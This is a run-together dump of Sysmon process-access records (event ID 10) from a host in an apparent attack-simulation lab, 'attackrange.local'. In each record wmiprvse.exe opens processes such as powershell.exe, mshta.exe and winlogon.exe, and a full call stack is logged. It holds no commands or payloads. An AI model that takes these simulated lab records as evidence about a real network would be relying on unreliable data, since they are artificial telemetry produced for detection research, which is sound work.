15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5352-6008-2906-00000000A301}8004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022867Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022866Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2706-00000000A301}4972C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022865Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022864Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2506-00000000A301}7236C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022863Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2406-00000000A301}2136C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022862Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2306-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022861Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5351-6008-2206-00000000A301}6044C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022860Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022859Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022858Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022857Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022856Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022855Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022854Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022853Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022852Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.241{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022851Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022850Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022849Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:15.226{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022848Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 